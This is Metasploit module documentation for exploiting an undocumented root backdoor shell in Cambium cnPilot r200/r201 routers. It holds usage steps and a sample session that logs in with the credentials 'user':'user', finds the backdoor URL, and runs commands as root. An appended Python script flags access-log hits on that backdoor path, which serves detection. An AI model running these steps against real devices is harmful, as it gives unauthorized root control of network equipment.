rapid7/metasploit-framework
documentation/modules/auxiliary/admin/http/cnpilot_r_cmd_exec.md

Cambium cnPilot r200/r201 device software versions 4.2.3-R4 and newer contain an undocumented backdoor 'root' shell. This shell is reachable at a specific URL by any authenticated user. The module uses this shell to execute arbitrary system commands as 'root'.

## Verification Steps

1. Do: ```use auxiliary/scanner/http/cnpilot_r_cmd_exec```
2. Do: ```set RHOSTS [IP]```
3. Do: ```set RPORT [PORT]```
4. Do: ```set CMD [command]```
5. Do: ```run```

## Scenarios

```
msf > use auxiliary/scanner/http/cnpilot_r_cmd_exec
msf auxiliary(cnpilot_r_cmd_exec) > set RHOSTS 1.3.3.7
msf auxiliary(cnpilot_r_cmd_exec) > set RPORT 80
msf auxiliary(cnpilot_r_cmd_exec) > set CMD uname -a
msf auxiliary(cnpilot_r_cmd_exec) > run

[+] 1.3.3.7:80 - Cambium cnPilot confirmed...
[*] 1.3.3.7:80 - Attempting to login...
[+] SUCCESSFUL LOGIN - 1.3.3.7:80 - "user":"user"
[*] 1.3.3.7:80 - Checking backdoor 'root' shell...
[+] 1.3.3.7:80 - You can access the 'root' shell at: http://1.3.3.7:80/adm/syscmd.asp
[+] 1.3.3.7:80 - Executing command - uname -a
[+]
Linux cnPilot-R201 2.6.36 #1 Thu Feb 9 03:02:39 CST 2017 mips unknown


[+] File saved in: /root/.msf4/loot/20000000000003_default_1.3.3.7_cmdexeclog_12345.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
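As an added defensive example, not part of the module or its documentation, the following Python script parses constructed web-server access-log lines and flags requests to the backdoor shell path reported in the scenario above, which is the indicator a defender would alert on. It assumes Apache/nginx "combined" log format from a proxy or sensor in front of the device; the non-backdoor paths in the sample are made up.

```python
import re
from collections import Counter

# Backdoor shell path reported by the module (see scenario output above).
BACKDOOR_PATH = "/adm/syscmd.asp"

# Apache/nginx "combined" access-log layout is an assumption; the cnPilot
# itself may not log this way, so feed logs from a proxy or sensor in front.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

def parse_line(line):
    """Return a dict of fields for one log line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def is_backdoor_hit(fields):
    """True when the request path (query string stripped) is the backdoor shell."""
    path = fields["target"].split("?", 1)[0]
    return path.lower() == BACKDOOR_PATH

def find_hits(lines):
    """Return the parsed entries that touched the backdoor path, in log order."""
    return [f for f in map(parse_line, lines) if f and is_backdoor_hit(f)]

def summarize(hits):
    """Count hits per source address so repeat offenders stand out."""
    return Counter(h["src"] for h in hits)

# Constructed sample log lines (not real traffic); paths other than the
# backdoor are invented. The last valid entry shows a command submission.
SAMPLE_LOG = [
    '10.0.0.5 - - [09/Feb/2017:03:02:39 +0000] "GET /index.asp HTTP/1.1" 200 1024',
    '10.0.0.5 - - [09/Feb/2017:03:02:41 +0000] "POST /login HTTP/1.1" 302 0',
    '10.0.0.5 - - [09/Feb/2017:03:02:44 +0000] "GET /adm/syscmd.asp HTTP/1.1" 200 512',
    '10.0.0.9 - - [09/Feb/2017:03:05:10 +0000] "GET /status.asp HTTP/1.1" 200 2048',
    '10.0.0.5 - - [09/Feb/2017:03:02:45 +0000] "POST /adm/syscmd.asp?x=1 HTTP/1.1" 200 300',
    'garbage line that does not parse',
]

if __name__ == "__main__":
    hits = find_hits(SAMPLE_LOG)
    for h in hits:
        print(f"{h['ts']} {h['src']} {h['method']} {h['target']} -> {h['status']}")
    print("hits per source:", dict(summarize(hits)))
```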